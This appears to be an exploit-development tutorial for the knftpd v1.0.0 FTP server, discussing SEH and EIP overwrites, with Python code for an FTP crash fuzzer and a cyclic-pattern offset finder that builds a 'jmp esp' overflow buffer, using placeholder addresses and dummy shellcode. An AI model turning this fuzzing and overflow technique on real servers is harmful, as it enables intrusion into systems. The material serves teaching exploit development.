Just follow the application's flow

knftpd v1.0.0
Conceptually, when we find during exploit development that an application has SEH protection, we must first bypass SEH with a POP,POP,RETN instruction sequence, which returns execution to the Next SEH (nSEH) position where we place our short jump and from there control where EIP goes. But sometimes we must follow the application's flow instead.
Now we will try to build an exploit by following the application's flow. We will use the knftpd v1.0.0 application. Hmm, it sounds like good practice material for this case. I know it was already exploited last year and the exploit can be found here, but here I'm trying to explain how to build an exploit for that application.
The application overflows if we send an overly long argument to several FTP commands, so we can create a fuzzer like the one below to crash the application:
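The fuzzer below is an added example written for this post, not the original fuzzer and not knftpd's own code. It assumes the target host and port come from the command line, that the server accepts an anonymous login, and that the list of commands to fuzz and the argument lengths are good starting guesses (both are assumptions, not what the original fuzzer used). Each case goes out on a fresh connection, so when the server stops answering the case before the failed connect is the one that crashed it:

```python
#!/usr/bin/env python3
"""Multi-command FTP fuzzer (added example; not the original post's fuzzer).

Assumptions (not from the original page): target host/port come from argv,
the server accepts an anonymous login, and each test case is one command
followed by a growing filler argument.
"""
import socket
import sys

# Commands that take an argument. The post says several of them overflow;
# this list is an assumption, not the set the original fuzzer used.
COMMANDS = ["USER", "PASS", "CWD", "MKD", "RMD", "DELE", "RETR", "STOR", "LIST", "NLST"]

# Argument lengths to try, in growing steps (assumed values).
LENGTHS = [100, 200, 500, 1000, 2000, 5000]


def build_cases(commands=COMMANDS, lengths=LENGTHS, filler=b"A"):
    """Return (command, argument_length, wire_bytes) tuples in send order.

    Each wire line is exactly what goes on the socket, 'CMD <filler*n>\\r\\n',
    so the caller can log the last case sent before the server died.
    """
    cases = []
    for cmd in commands:
        for n in lengths:
            line = cmd.encode() + b" " + filler * n + b"\r\n"
            cases.append((cmd, n, line))
    return cases


def recv_reply(sock):
    """Read one FTP reply; return b'' if the peer closed or went silent."""
    try:
        return sock.recv(1024)
    except (ConnectionResetError, socket.timeout):
        return b""


def fuzz(host, port=21, timeout=3.0):
    """Send each case on a fresh connection.

    Returns the case that crashed the server (the last one sent before a
    connect failed), or None if the server survived every case.
    """
    last = None
    for case in build_cases():
        cmd, n, line = case
        try:
            with socket.create_connection((host, port), timeout=timeout) as s:
                s.settimeout(timeout)
                if not recv_reply(s):          # no banner: server is gone
                    return last
                # Log in first so commands after authentication actually get
                # parsed; USER/PASS are fuzzed directly, before that step.
                if cmd != "USER":
                    s.sendall(b"USER anonymous\r\n")
                    recv_reply(s)
                if cmd not in ("USER", "PASS"):
                    s.sendall(b"PASS anon@example.invalid\r\n")
                    recv_reply(s)
                print(f"[*] {cmd} with {n} bytes")
                s.sendall(line)
                recv_reply(s)
        except OSError as e:
            # Could not connect: the server most likely died on the previous case.
            print(f"[!] connect failed before {cmd}/{n}: {e}")
            return last
        last = case
    return None


if __name__ == "__main__":
    if len(sys.argv) < 2:
        sys.exit(f"usage: {sys.argv[0]} <host> [port]")
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 21
    hit = fuzz(target, port)
    if hit:
        print(f"[+] crash after {hit[0]} with {hit[1]} bytes: {hit[2][:40]!r}...")
    else:
        print("[-] server survived every case")
```

Run it with the debugger already attached to knftpd; the line printed just before the connect fails tells you which command and which length to reproduce with a single send.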

Build an exploit in low space of your stack (Egg Hunter)


Sometimes when we fuzz an application it crashes and our fuzzer has overwritten some of its registers (their values replaced with our fuzzer's data). The most dangerous case is when our fuzzer overwrites the value of the Instruction Pointer register (IP on 16-bit, EIP on 32-bit), because then we have full control of that register and can change the flow of the application as we want.
Why is that? Because the EIP register holds the memory address (the offset) of the next instruction to be executed. So what happens if we send our payload onto the application's stack and then put into EIP the address of an instruction that jumps into the stack?
Our payload executes and it's owned. ^_^
To guard against this, developers usually rely on an exception mechanism called Structured Exception Handling (SEH) to protect the application; since the handler record itself lives on the stack, it is the next thing an overflow can overwrite, which is why the SEH case is treated separately.
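An added example (not from the original post) of the two steps that follow the crash described above: finding which bytes of the buffer landed in EIP, and laying out the buffer so EIP points at an instruction that jumps into the stack. It uses a Metasploit-style cyclic pattern, a constructed simulation of the crash in place of a real debugger, and a placeholder return address; the offset (112) and the address are assumptions for illustration, not values from knftpd:

```python
#!/usr/bin/env python3
"""Find the EIP offset with a cyclic pattern, then build the classic
"return into the stack" buffer. Added example; offsets and addresses are
placeholders, not values taken from the knftpd exploit."""
import itertools
import string
import struct

UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits
MAX_PATTERN = len(UPPER) * len(LOWER) * len(DIGITS) * 3   # 20280 bytes


def pattern_create(length):
    """Metasploit-style cyclic pattern (Aa0Aa1...Ab0Ab1...).

    Every 4-byte window is unique within MAX_PATTERN bytes: each upper/lower/
    digit triple occurs once, and the character classes reveal the alignment.
    """
    if length > MAX_PATTERN:
        raise ValueError(f"pattern longer than {MAX_PATTERN} is not unique")
    out = []
    for u, lo, d in itertools.product(UPPER, LOWER, DIGITS):
        out.append(u + lo + d)
        if len(out) * 3 >= length:
            break
    return "".join(out)[:length].encode()


def pattern_offset(eip_value, length=MAX_PATTERN):
    """Offset in the pattern of the 4 bytes that ended up in EIP, or -1.

    eip_value is the register as shown by the debugger (an integer); x86 is
    little-endian, so it is packed back to the byte order it had in memory.
    """
    needle = struct.pack("<I", eip_value)
    return pattern_create(length).find(needle)


def simulate_crash(buf, ret_offset):
    """Constructed stand-in for the debugger: pretend the saved return
    address sits ret_offset bytes into the copied buffer and report what EIP
    would hold after the function returns into it."""
    return struct.unpack("<I", buf[ret_offset:ret_offset + 4])[0]


def build_exploit(offset, jmp_esp_addr, shellcode, nop_sled=16):
    """Buffer layout for a direct EIP overwrite:

        [junk up to saved EIP][address of 'jmp esp'][NOP sled][shellcode]

    After the overwritten return executes 'jmp esp', ESP points just past the
    return address, so execution lands in the sled and slides into shellcode.
    """
    return (b"A" * offset
            + struct.pack("<I", jmp_esp_addr)
            + b"\x90" * nop_sled
            + shellcode)


if __name__ == "__main__":
    # Step 1: crash the target with the pattern instead of plain 'A's.
    pattern = pattern_create(300)
    eip = simulate_crash(pattern, 112)          # 112 is an assumed offset
    print(f"EIP=0x{eip:08x} -> offset {pattern_offset(eip)}")

    # Step 2: rebuild the buffer with a jump into the stack at that offset.
    # 0xDEADBEEF is a placeholder; in a real exploit it is the address of a
    # 'jmp esp' found in a loaded module.
    buf = build_exploit(pattern_offset(eip), 0xDEADBEEF, b"\xcc" * 4)
    print(f"buffer: {len(buf)} bytes, EIP bytes at 112 = {buf[112:116].hex()}")
```

The same pattern_offset call works on a real crash: paste the EIP value from the debugger in place of the simulated one and it returns the byte position to replace with the jump address.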